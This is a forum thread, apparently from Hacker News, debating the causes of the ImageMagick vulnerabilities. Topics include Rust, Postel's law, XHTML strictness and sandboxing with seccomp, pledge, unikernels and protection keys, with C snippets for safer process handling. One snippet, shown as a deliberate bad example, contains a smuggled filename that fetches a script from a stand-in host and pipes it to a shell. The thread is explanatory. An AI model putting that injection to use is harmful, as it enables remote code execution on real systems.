So, we get it. Complicated file and network formats, handled in C code, lead to these types of security issues.
We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).
I hope it will lead to a change on two fronts:
1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
How is creating new image formats and getting the entire Web to adopt them easier than making more secure image decoders?
It's especially irrelevant to this series of vulnerabilities, since they work by getting ImageMagick to parse less popular image formats. Inventing new ones won't do anything to mitigate these flaws.
> if it was going to, it already would have (and this is from someone already writing Rust code).
The 'Magick' in this case is less welcome when your system is pwned. Maybe formats and tools with less magic will have, I don't know, fewer vectors for compromise.
We had better options before and after C, yet here we are. Not to piss on Rust's parade, but it may prove not to be the white knight people hope for. And I like Rust - I am probably just less emotionally clouded in my viewpoint.
I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.
I don't really agree with the rest. "Simple file formats" is a theoretically nice idea which is impractical – after all, features are added to file formats for a reason. "Restrictive not permissive" is, as others have pointed out, a divergence from the generally useful Postel's law. Writing a library which cannot handle common problems in file formats – of which there are a huge number, due to sloppy implementation – is a good way to ensure you have developed a library which will be used by few.
>I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.
There have been all sorts of safe languages that are appropriate for image processing and other types of programs, but people apparently like programming in C more than they like secure software. It is hard to see how something like Common-Lisp/Ocaml/Haskell/Java/Eiffel/C#/Ada wouldn't be more than up to the task, with only a slight speed penalty. It seems more like a social issue than a technical one. Maybe Rust will finally be able to break through, but I wouldn't hold your breath.
Regarding point 2, I think we need to consider Postel's Law a design antipattern, rather than a hallmark of good design. From now on, good software should not be permissive in what it accepts, because there is no good way to guarantee that such permissiveness will not lead to security breaches down the line.
CSS error handling is a good example: instead of old browsers throwing a fit and dying on declarations they don't understand, they ignore them and carry on. So we know that a browser which doesn't implement 'someprop: awesome-new-value' will go ahead and read 'someprop: boring-old-value' instead of stopping processing of the CSS, or worse, emitting an error and refusing to render the page altogether. Without this, it would effectively be impossible to ship new web features until old browsers had died off to <epsilon-of-users-we-don't-care-about>.
There's a crucial distinction to be made. Ignoring unknown properties is a defined part of the CSS spec, so implementing it that way is just being correct. Postel's Law leads to trouble when "being liberal" means unilaterally extending the spec in ill-defined and ultimately incompatible ways. Example: autocorrecting "awesome-new-value" to its closest known match "alternative-old-value".
I'll agree that Postel's Law should not be interpreted as "when something doesn't fit, force it". The most effective examples tend to have a duality: areas where permissiveness is allowed and areas where it's constrained. (E.g. The CSS/JSON must be well-formed, but the properties can vary.)
Getting underneath the patterns and anti-patterns of permissiveness in an informed way is a lot more useful IMO than the knee-jerk reaction of declaring all permissiveness harmful and running away. Especially in light of the web's incredible wins via this strategy.
From a purely financial point of view, you may well be right: the technical and social benefits of clean, elegant, reliable, correct software probably don't justify sacrificing something as profitable as the permissiveness of the Web.
But these are pretty damn twisted priorities. A little bit of social responsibility wouldn't hurt.
I would disagree with that greatly. Postel's law says there's no need to excessively constrain what's considered valid input, not to ignore basic bounds checking and security.
Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
This depends on how much graceful degradation is available to you. In systems/domains where little is available, following Postel's law can result in silent failures rather than explicit/loud ones. The question isn't whether they break or how brittle they are, but whether you will notice when they do break. Each system sits somewhere on a continuum of how acceptable Postel's law is.
Also, just because Postel's law worked for a small group of highly skilled systems programmers implementing common infrastructure for everyone, it doesn't automatically follow that it will work for a large and fast growing group of programmers of wildly varying skill, each implementing their own or their employer's brilliant business idea.
>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.
Being liberal in what you accept is precisely the definition of brittle: if there's an update that reduces the set of representable input data, but you keep the code that processes the user's input into data, then an untested, little-used edge case could invalidate your assumptions about the rest of the system.
Reply to sibling: “Did any browser reject poorly formed XHTML?” Yes, they did, if the XHTML was served with a MIME type of application/xhtml+xml.
However, this MIME type was extremely rare because MSIE would not show a web page unless the MIME type was text/html.
Furthermore, the extreme brittleness of XHTML was generally regarded as a Bad Move, as one single URL in your source code with a literal ampersand instead of &amp; would cause a complete and total breakage of your web page. Of course, many web pages are crummily concatenated strings, and there are a lot of web devs who would never be able to reliably generate 100% XHTML-compliant output. Shit, pasting in a snippet of HTML where the BR tags omitted the self-closing slash would break your XHTML validation.
>Did any browser ever reject a Web page just because it wasn't well-formed XHTML?
Of course. If you served XHTML properly (by setting "application/xhtml+xml" MIME type), ill-formed XHTML would just show you a big syntax error instead of the page. Try it, that's still the case.
Even when their markup was well-formed, lots of sites still used the "text/html" type to trigger the HTML (SGML) parser instead of the XML one, since any 3rd-party code embedded in the website would of course crash the page as well.
That was one of the reasons why XHTML never got popular and was eventually abandoned.
That still wasn't serious enough. All it took to get browsers to accept non-XHTML pages was to change the MIME type. What I'm talking about is simply not displaying ill-formed pages at all, under any circumstances.
But with that MIME type it wasn't XHTML at all. It was being parsed as HTML, which was possible only because of the big similarity between the two formats. All you need to ensure the behavior you want is to disable HTML parsing (whose specification already pretty much mandates being liberal in what the parser accepts).
And this is precisely the point. If the very earliest browsers had insisted on correctness rather than permissively accepting broken HTML (and JS - see semicolon insertion), we would not now have a situation where browsers need to do a ton of work to allow graceful degradation in the face of awful markup, simply because the tooling would have evolved in the other direction. Postel's Law gains a little temporary sender convenience in exchange for a nasty mess of permanent receiver headaches.
Postel's law has two parts. "Be gracious in what you receive" is what most people are talking about, but "be cautious in what you send" is just as important. If people are using broken markup, that's the problem that needs fixing. How many web devs bother with validation anymore? (And not for app-like functionality, but for what should be simple text and images with a few menus - why are so many newspaper websites so awful?)
> 2.10. Robustness Principle
>
> TCP implementations will follow a general principle of robustness: be conservative in what you do, be liberal in what you accept from others.
The problem is that being conservative and precise isn't enough. You and I can both be conservative, but disagree on the specifics (given an ambiguous spec, for instance). A permissive receiver of both our data now has to support both sides of our disagreement forever.
They do if they have any competition. Browsers are the perfect example here: a browser which responds to broken HTML by refusing to render it (without exploding, mind) is going to lose out to one which renders it anyway. That means market forces pin the disagreement in place.
> but be cautious in what you send is just as important.
How are you going to enforce this for everyone?
> TCP implementations will follow a general principle of robustness (...)
This rule has worked well for TCP implementors in large part because of their circumstances, which are very different from those of browser implementors and Web developers:
(0) Priorities: How much do the following desiderata matter to each group: reliability, performance, new features?
(1) Skill: What skills does a representative programmer from each group have?
(2) Risk profile: How does each group cope with the possibility of design and implementation errors? How much technical debt are they willing to take?
I'd contend that Postel's law doesn't scale beyond relatively small groups of highly skilled programmers, for whom reliability is paramount and trumps all other considerations.
Exactly. So by being permissive from the start we now have this dumpster fire that prevents us from writing sane and performant code, because with crap input we have to guess what the user actually wanted.
Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.
Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
> Imagine what C++ would look like if all compilers had to accept all different variations of it, and the result of compiling 100 almost valid C++ files should, as far as possible, be a program that runs in some sense.
C++ is still a lot more permissive than it could and should be.
> Most of the web pages I have ever written have probably been ill-formed because browsers don't tell me what's wrong, and instead show me a (nearly) working web page.
Same here. The idea that JavaScript ought to be permissive and forgiving because its target audience doesn't know what they're doing turned out to be a self-fulfilling prophecy on the part of its designers.
It would be a lot more sensible than you think. When I get a compilation error, what I do is take a breath, think about the meaning of my code, correct any logical mistakes I can find, and try to compile again. Why couldn't Web developers do the same?
Also, there's no need to crash the tab. The browser could simply stop running any JavaScript, and leave the user with a static page.
IIRC some of the older versions of Internet Explorer did something like that, showing the user a popup when an error happened and asking them if they wanted to keep going.
The solution I've been experimenting with is to run this sort of code in an isolated, network-stack-free unikernel environment.
Imagine that you've built the ImageMagick library into a unikernel server using a virtio serial port for I/O. When you need to process an image, you boot a VM with this imagemagick kernel, then pipe the image data through its virtual serial port. Data goes in, data comes out...
And if the attacker manages remote code execution inside the VM, who cares? There's nothing in there. There's no network stack, there's no access to storage, there's no access to other processes; all you give this VM is the RAM and serial port the unikernel needs to do its job.
Or... you could just run it as nobody and maybe unshare its network and chroot it and not add the surface area of some virtio driver to your stack?
Like, there's no magic to a unikernel. It's just a process in a jail, unless you're legitimately running it directly on the cpu. Adding more layers of abstraction does not inherently add security.
It's the removal of abstraction layers which appeals to me. Why secure the kernel syscall interface when you can remove it? The hypervisor will be a potential attack surface anyway, so it's not a new point of vulnerability.
Sure, it's just a different kind of jail, but I'd rather start with a jail that is empty by default and add selected features to it when I'm convinced they're safe, than start with an ordinary apartment and remove things from it until I think it's secure enough to function as a jail cell.
I think the difference is that that seems like something I would screw up. I know how to make a $5 DigitalOcean instance that only has ImageMagick that I can pipe photos to and from. I don't trust myself to unshare the network from some running process without leaving other holes.
There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root.
I'm... very skeptical that it's trivial to make a $5 DO instance you can pipe imagemagick to from another host and has nothing else on it. Note that if you're talking about using a linux image, this is not even remotely a unikernel.
Also, there are still myriad ways this kind of interface can represent an attack surface if you aren't sufficiently careful with the communication protocol (that presumably you are writing).
How is "There are all these gotchas when you have stuff running in the same OS and it just takes one little mistake and your adversary has root" not saying that the Unix security model is too hard to use?
"seccomp()" (old simple mode) does pretty much this but much more simply and efficiently - disallows all system calls except read() and write() to existing file descriptors, and exit() and sigreturn().
With containers I already get such security. For example, I can run ImageMagick binaries inside a container with no network, no capabilities and a minimal syscall interface. The attack surface of such a setup is not particularly larger than the hypervisor interface, but performance is much closer to that of a native executable.
I think before #1, #2, or Rust, we need a better "libsandbox". You don't even need containers to do this -- DJB showed how to do this with Unix over a decade ago [1]. See section 5.2: isolating single source transformations.
I think the reason people don't do this is because it's extremely platform-specific. Most of this C code runs on Windows too (ImageMagick, ffmpeg, etc.)
And it's complicated. But if there were a nice library to do all this stuff, I think people would use it.
If you're just shelling out to command line tools like ImageMagick, you don't even have to change any C code... you can just run it under a wrapper (sorta like systemd-nspawn). But I think most people are not using ImageMagick that way -- they are using a Python/Ruby binding, etc.
But it can still be done -- it just takes a little effort. MUCH less effort than changing any of that old crufty code, much less rewriting it in Rust!
This kind of problem is inherent to the Unix model of processes communicating by passing byte streams around. The way to solve it properly would be to make the process command interface something more structured (e.g. thrift/protobuf), so that rather than shelling out to wget --whatever and hoping you've escaped it correctly you'd pass an actually structured command.
The process command interface is more structured! You don't have to go through /bin/sh and worry about escaping. You could call exec. Ok, so you'd still have to worry about sticking "--" before the URL, but that's easy. No more worries about quoting.
Of course, chaining multiple commands together is a pain, and that's what the shell is good at, but then it is hard to get the quoting right. So: a more structured shell interface. There's libpipeline, but I haven't used it enough to comment.
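For the simple single-command case, here's a sketch of what "just call exec" means in C - the URL lands in its own argv slot, so no quoting is ever involved (fetch() is a made-up wrapper name):

    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>

    /* Run wget without going through /bin/sh: shell metacharacters in
       url are inert bytes in argv, not syntax. */
    static int fetch(const char *url) {
        pid_t pid = fork();
        if (pid < 0)
            return -1;
        if (pid == 0) {
            /* "--" ends option parsing, so a hostile url beginning with
               "-" can't be misread as a flag. */
            execlp("wget", "wget", "--", url, (char *)NULL);
            _exit(127); /* only reached if exec failed */
        }
        int status;
        if (waitpid(pid, &status, 0) < 0)
            return -1;
        return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
    }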
But images and videos are byte streams already... The security boundary is often the network, where things are serialized anyway. The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.
The rest of the application will need to run with privileges to actually do the stuff you care about, like display things to your screen and so forth.
> But images and videos are byte streams already...
Right, but the reason for this bug (and many others) is the mingling of the data bytestream and the command channel (the arguments for the call to wget).
> The whole point is to sandbox the deserialization only, which has a large attack surface due to complex conditionals and string handling.
I don't think that would help. Your sandboxed deserializer deserializes the video file into an inert datastructure. But then you go to system() to wget based on that datastructure and you're pouring commands and data into a flat stream. That architecture won't stop you from parsing a bunch of unix commands as image bytes and then passing those "image bytes" on the command line.
DJB may be a prominent cryptographer, but his code and security practices, especially around qmail, are simply atrocious. I wouldn't quote him for anything that touches real C code.
Can you elaborate on this? I have never thought of "atrocious" when someone mentioned the history of vulnerabilities in djb's software. Depending on how egregious these security practices are there could be a $500 check in it for you.
Oh yes, because denying that your code has a vulnerability counts as a good security practice.
You know why this MTA has that low count of published bugs? Because nobody uses it anymore, so nobody looks at its code (and now factor in the ugliness of the code itself, which lowers the eagerness to look at the code even more). It's not because the code is (magically?) better.
One file per C function is an old practice you can still see in many libc implementations and in other pieces of code designed to be used as a static library. Since a traditional Unix static library is nothing but an archive of .o files, and a traditional Unix linker makes its include-or-omit decisions on the granularity of an .o file, putting each function in a separate source file maximizes the linker's ability to strip unused functions out of a static library.
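A toy example of the layout (hypothetical names):

    /* alpha.c -- one function per translation unit, libc-style.
     *
     * Build:   cc -c alpha.c beta.c
     *          ar rcs libutil.a alpha.o beta.o
     *
     * A program that calls only alpha() links in alpha.o alone;
     * beta.o stays out of the binary, because a traditional linker
     * pulls whole .o members from the archive or not at all.
     */
    int alpha(int x) { return x + 1; }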
> So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.
Actually, the magic byte thing makes me think this is a content sniffing issue, and the RCE might be due to a "feature". Rust won't help or, at best, would make it more awkward to exploit.
A capability-based (i.e. memory-safe, no accessible globals that can induce side effects) system would mitigate this, though. If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.
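In C you can only approximate this by convention, but a sketch of the shape of such an API (all names hypothetical) might be:

    #include <stddef.h>
    #include <sys/types.h>

    /* The caller hands the library only the authority it needs: two
       byte-stream capabilities. Nothing ambient is reachable from
       inside rescale_image() -- no open(), no connect(), no globals.
       (A real capability system enforces this at the language or OS
       level; this struct alone is just a convention.) */
    typedef struct {
        ssize_t (*read_in)(void *ctx, void *buf, size_t len);
        ssize_t (*write_out)(void *ctx, const void *buf, size_t len);
        void    *ctx;
    } image_caps;

    int rescale_image(const image_caps *caps, int new_width, int new_height);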
> Check out OpenBSD's pledge, it's addressing precisely this problem.
Au contraire.
You can fork(), restrict yourself to a couple of pipes in a subprocess, pledge(), do the calculation in the subprocess, and exit the subprocess. It'll work, and it'll be slow. But this isn't at all specific to pledge() -- seccomp can do exactly the same thing, arguably more simply. Performance will suck either way.
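Roughly like this on OpenBSD (parse_untrusted() is a hypothetical stand-in for the risky calculation):

    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>

    void parse_untrusted(int in_fd, int out_fd); /* hypothetical */

    int parse_in_sandbox(int in_fd, int out_fd) {
        pid_t pid = fork();
        if (pid < 0)
            return -1;
        if (pid == 0) {
            /* Child: "stdio" leaves little beyond read()/write() on
               descriptors we already hold; the kernel kills the
               process on anything more ambitious. */
            if (pledge("stdio", NULL) != 0)
                _exit(1);
            parse_untrusted(in_fd, out_fd);
            _exit(0);
        }
        int status;
        waitpid(pid, &status, 0);
        return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
    }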
<rant>I have yet to see a credible argument for how pledge() is better than seccomp. You could almost implement pledge() as a library function that uses seccomp, and I consider the one part of pledge (execve behavior) that this won't get right to be a misfeature in pledge.</rant>
The performance of that scheme will be abysmal for anything that does very fine-grained sandboxing. What you want is language support. E (erights.org) does this as a matter of course. Rust and similar languages could if they were to allow subsetting of globally accessible objects. Java and .NET tried to do this and fell utterly flat.
I've considered trying to get a nice Linux feature to do this kind of sandboxing with kernel help (call a function that can only write to a certain memory aperture without the overhead of forking every time), and maybe I'll get this working some day.
There are several differences, e.g. pledge is not inherited across exec, while seccomp is. Also, seccomp is vastly more complex, and it is not really possible to filter by e.g. filename, so you need additional tools.
You'd set the library's code and data pages to protection key 1, along with the page containing a library access trampoline, leaving the rest of the address space with protection key 0. You'd call into the library through the trampoline, which would revoke access to protection key 0, call into the library, then restore access to key 0.
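You could prototype a variant of that on Linux today with memory protection keys (pkeys, glibc 2.27+ on x86). The inverse formulation below is runnable without the stack-switching the full scheme needs: tag just the sensitive pages and revoke those during the call. (Names like secret_pages are hypothetical, and note that pkey_set() is unprivileged, so this guards against bugs, not against determined exploit code.)

    #define _GNU_SOURCE
    #include <sys/mman.h>

    static int secret_key;

    /* Tag the pages holding sensitive data with their own protection
       key; the rest of the address space keeps the default key 0. */
    void protect_secrets(void *secret_pages, size_t secret_size) {
        secret_key = pkey_alloc(0, 0);
        pkey_mprotect(secret_pages, secret_size,
                      PROT_READ | PROT_WRITE, secret_key);
    }

    /* Trampoline: revoke access to the tagged pages while untrusted
       library code runs, then restore it. */
    int call_library(int (*lib_entry)(void *), void *arg) {
        pkey_set(secret_key, PKEY_DISABLE_ACCESS);
        int r = lib_entry(arg);
        pkey_set(secret_key, 0);
        return r;
    }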
That's a whack-a-mole approach that doesn't even try to define a real security boundary. It will catch the most common errors, sure, but it's not a long-term solution.
> If I call out to ImageMagick and say "rescale this image", ImageMagick should not be able to initiate network requests in response.
Impossible in a world where programmers routinely cram together networking and file transformations without any regard for whether the operation belongs there or not (build systems that on a `compile' command download random things from the internets; even Rust's build system does such a dumb thing, downloading rustc after running an hour-long LLVM compilation instead of failing before doing anything).
So the way to prevent robots from throwing people off a cliff is to use a capability system that only allows robots to kill people when explicitly authorized?
Is it not just improper shell escaping? You could do that incorrectly in any language. If you're not quoting | and ` and stuff correctly when you call system() you're doomed no matter the language.
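The classic mistake, sketched in C (filename is attacker-controlled):

    #include <stdio.h>
    #include <stdlib.h>

    /* DANGEROUS: user data is spliced into a shell command line. */
    void convert_bad(const char *filename) {
        char cmd[1024];
        snprintf(cmd, sizeof cmd, "convert %s out.png", filename);
        /* filename = "x.png; wget http://evil.example/s | sh" also
           runs the wget, because system() hands the whole string to
           /bin/sh. */
        system(cmd);
    }

Building an argv and calling exec directly, as sketched upthread, sidesteps the problem in any language.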
qmail has already been pointed to elsewhere in this discussion. One of the qmail security principles, which are fast approaching 20 years old, is the maxim: Don't parse. This is directly applicable here.
The GNKSOA-MUA comes to mind, too. The other vulnerabilities (there being five -- see the mailing list message) are related to the idea of allowing input data files to contain embedded actions and commands to be executed by the data processing tool. In the world of mail there were many variations on this theme. Clifton T. Sharp Jr's Usenet signature was "Here, Outlook Express, run this program." "Okay, stranger.".
From googling and looking at the source, this looks like it has nothing to do with C; it's more of a logic error where a handler delegates control to another process (curl, for example) based on image type. I could be wrong, but that's what it looks like to me.
> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.
> 2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.
It is really interesting that the techniques needed to achieve these security goals (the theory of grammars) come from one of the oldest and best-explored areas of computer science.
I've been writing Rust too, but I'm not sure why the argument that it'll reduce the attack surface is glib. It can't prevent all security holes, though, because nothing can.
1. is not applicable even in the mid-term, unless you want to break the internet
2. is breaking the internet
I'm not sure I'm ready to accept the collateral damage of your solutions.
How about looking at "C" (or any other language with direct memory access) as the culprit? (EDIT: Assuming it's a C-issue after all and not just some dumb input validation problem.)
Hopefully it will convince developers to not trust the client and actually confirm the user uploaded a .jpg, .png or .gif. But I guess that isn’t nearly as useful for us when we want a reason why we need to rewrite everything. :)